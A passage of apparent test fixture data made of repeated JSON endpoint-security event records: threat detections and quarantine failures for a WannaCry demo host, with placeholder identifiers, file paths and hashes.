Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":414000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782275","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":368000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":884000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":541000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 